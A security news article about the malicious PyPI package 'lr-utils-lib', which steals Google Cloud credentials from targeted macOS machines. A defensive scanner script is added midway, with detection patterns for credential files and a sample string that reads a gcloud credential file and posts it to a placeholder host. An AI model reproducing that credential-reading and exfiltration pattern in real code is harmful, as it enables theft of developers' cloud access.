Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials

27 Jul, 2024 Newsroom Information Security / Cloud Security

Cybersecurity researchers have identified a malicious package on the Python Package Index (PyPI) repository that targets Apple macOS systems with the aim of stealing Google Cloud credentials from a narrow set of victims.

The package, named "lr-utils-lib," was uploaded in early June 2024 and was downloaded 59 times before it was taken down.

"The malicious software leverages a set of preset hashes to pinpoint specific macOS devices and endeavors to gather Google Cloud validation information," Yehuda Gelb, a researcher at Checkmarx, said in a report published on Friday. "The harvested credentials get dispatched to a distant server."

A notable feature of the package is that it first checks whether it is running on macOS, and only then compares the system's Universally Unique Identifier (UUID) against a hard-coded list of 64 hashes. Because the list holds hashes rather than plaintext UUIDs, it identifies the intended victims without revealing their machine identifiers to anyone who inspects the package.

If the compromised machine is on that list, the package attempts to read two files from the ~/.config/gcloud directory, application_default_credentials.json and credentials.db, which hold Google Cloud authentication data. These are the files the gcloud CLI writes after "gcloud auth application-default login" and "gcloud auth login" respectively, and any process running as that user can read them, so a developer who ran the package on a targeted machine should treat those credentials as compromised and revoke them.

The collected data is then exfiltrated over HTTP to a remote server at "europe-west2-workload-422915[.]cloudfunctions[.]net," a Google Cloud Functions endpoint, so the outbound traffic blends in with legitimate calls to Google infrastructure.
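The behaviour described above (platform check, hashed-UUID gate, credential-file read, HTTP egress) turned into a defensive hunt over Python source, written as an added example for this page and not taken from Checkmarx's report or from the package itself. It assumes the UUID is read with `ioreg -rd1 -c IOPlatformExpertDevice` and hashed with SHA-256, which the article does not state; the regexes, thresholds, the two sample sources and the `placeholder.cloudfunctions.net` host are this example's own constructs.

```python
"""Audit Python source for the gate-then-steal pattern described above.

Added example, not code from Checkmarx, lr-utils-lib or requests-darwin-lite.
Assumptions (not stated on the page): the UUID is read with
`ioreg -rd1 -c IOPlatformExpertDevice` and hashed with SHA-256; the
regexes and thresholds below are this example's own heuristics.
"""
import hashlib
import re
import subprocess
import sys
from pathlib import Path

# Indicators of the pattern: a macOS hardware-identity lookup, a block of
# hash literals to compare it against, reads of gcloud credential files, and
# egress to a Cloud Functions host. Each alone is common in benign code.
INDICATORS = {
    "macos_uuid_lookup": re.compile(r"IOPlatformUUID|IOPlatformExpertDevice|\bioreg\b"),
    "gcloud_credential_files": re.compile(
        r"application_default_credentials\.json|credentials\.db|\.config/gcloud"
    ),
    "sha256_literal": re.compile(r"['\"][0-9a-f]{64}['\"]"),
    "cloudfunctions_egress": re.compile(r"cloudfunctions\.net"),
}


def scan_source(text, min_hashes=8):
    """Return the set of indicator names present in one source file.

    A run of at least `min_hashes` 64-hex-char literals is reported as
    'hash_allowlist'; a single digest literal is too common to flag.
    """
    found = set()
    for name, pattern in INDICATORS.items():
        hits = pattern.findall(text)
        if name == "sha256_literal":
            if len(hits) >= min_hashes:
                found.add("hash_allowlist")
        elif hits:
            found.add(name)
    return found


def is_suspicious(found):
    """Flag only the combination: credential-file access gated on machine identity."""
    gated = "hash_allowlist" in found or "macos_uuid_lookup" in found
    return gated and "gcloud_credential_files" in found


def uuid_gate_matches(machine_uuid, hash_allowlist):
    """The targeting check itself: hash the UUID and look it up in the preset list."""
    return hashlib.sha256(machine_uuid.encode()).hexdigest() in hash_allowlist


def macos_platform_uuid():
    """Read IOPlatformUUID via ioreg on macOS; None elsewhere (assumed method)."""
    if sys.platform != "darwin":
        return None
    out = subprocess.run(
        ["ioreg", "-rd1", "-c", "IOPlatformExpertDevice"],
        capture_output=True, text=True, check=False,
    ).stdout
    m = re.search(r'"IOPlatformUUID"\s*=\s*"([0-9A-Fa-f-]+)"', out)
    return m.group(1) if m else None


def scan_tree(root):
    """Scan every .py file under `root` (e.g. a site-packages directory)."""
    report = {}
    for path in Path(root).rglob("*.py"):
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        found = scan_source(text)
        if is_suspicious(found):
            report[str(path)] = sorted(found)
    return report


# Constructed samples for offline use; neither is real package code.
TARGET_HASHES = [hashlib.sha256(f"target-{i}".encode()).hexdigest() for i in range(10)]
SAMPLE_SUSPICIOUS = (
    "import hashlib, os, platform, subprocess, requests\n"
    "TARGETS = [" + ", ".join(f'"{h}"' for h in TARGET_HASHES) + "]\n"
    "if platform.system() == 'Darwin':\n"
    "    raw = subprocess.check_output(['ioreg', '-rd1', '-c', 'IOPlatformExpertDevice'])\n"
    "    if hashlib.sha256(raw).hexdigest() in TARGETS:\n"
    "        blob = open(os.path.expanduser('~/.config/gcloud/credentials.db'), 'rb').read()\n"
    "        requests.post('https://placeholder.cloudfunctions.net/', data=blob)\n"
)
SAMPLE_BENIGN = (
    "from google.auth import default\n"
    "creds, project = default()  # reads ~/.config/gcloud/application_default_credentials.json\n"
)

if __name__ == "__main__":
    for label, src in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        found = scan_source(src)
        print(f"{label}: {sorted(found)} -> suspicious={is_suspicious(found)}")
    for root in sys.argv[1:]:
        for path, found in scan_tree(root).items():
            print(f"{path}: {found}")
```

Run it with one or more site-packages paths as arguments to check installed packages. The combination rule is the point: google-auth legitimately reads application_default_credentials.json and plenty of benign code embeds a digest literal, so only machine-identity gating next to credential-file access is worth a closer look.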

Checkmarx also found a fake LinkedIn profile under the name "Lucid Zenith," matching the package owner's name and falsely claiming to be the CEO of Apex Companies, which points to a possible social engineering component of the attack.

The identity of the threat actor is currently unknown. The discovery comes more than two months after security firm Phylum disclosed another supply chain attack involving a Python package named "requests-darwin-lite," which likewise triggered its malicious behaviour only after checking the UUID of the macOS host it was running on.

These attacks indicate that the threat actors already know something about the macOS systems they intend to compromise, and that they are going to considerable lengths to make sure the malicious packages execute only on those specific machines.

They also illustrate the tactics threat actors use to distribute counterfeit packages, with the aim of tricking developers into incorporating them into their applications.

"Whether the key targets are individuals or corporations might not be clear, but these assaults could have a considerable impact on organizations," Gelb said. "Although the initial breach generally commences on an individual developer's device, the stakes for corporations could be momentous."
